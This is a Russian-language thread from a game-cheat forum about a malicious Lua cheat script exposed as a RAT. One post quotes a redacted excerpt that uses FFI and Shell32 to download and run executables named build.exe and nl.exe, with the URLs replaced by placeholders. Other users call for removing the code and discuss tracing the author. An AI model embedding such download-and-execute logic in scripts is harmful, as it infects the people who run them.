Подведи собственные итоги года совместно с YOUGAME и забери ценные призы! Перейти

Всем пока, у меня рат

Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Это улучшение дабл тапа наверное было в кряке химеры
1645620642629.png

Это улучшение дабл тапа наверное было в кряке химеры
Посмотреть вложение 193663
кому надо че это за фигня была. Я бы в нле вообще сделал как в том же ските или в лв каком то, что можно запретить юзать ffi полностью или запретить загрузку файлов и прочее
C-like:
Expand Collapse Copy
local Shell32 = ffi.load "Shell32"
local function Download_And_Run(URL_Link, Run_File)
URL_Link = Http.Get(URL_Link)
local PFile = ffi.cast("ТОЖ УДАЛЕН")
// короче вирус качает "УДАЛЕНО"
end
Download_And_Run("вирус", "build.exe")
Download_And_Run("вирус", "nl.exe")

Последнее редактирование:
кому надо че это за фигня была. Я бы в нле вообще сделал как в том же ските или в лв каком то, что можно запретить юзать ffi полностью или запретить загрузку файлов и прочее
стоит удалить ссылки на файлы в коде

C-like:
Expand Collapse Copy
тут был redline
Стоит удалить фулл код я бы сказал, тут за вредоносное по и помощь в создании его - бан

Последнее редактирование:
Аккаунт "автора" тоже взломан. Иронично, но основа парня тоже снесена.
ахххаа тип он левый акк создал для ратника но вычислили основу? аыхъхах
скажи кто это

Назад
Сверху Снизу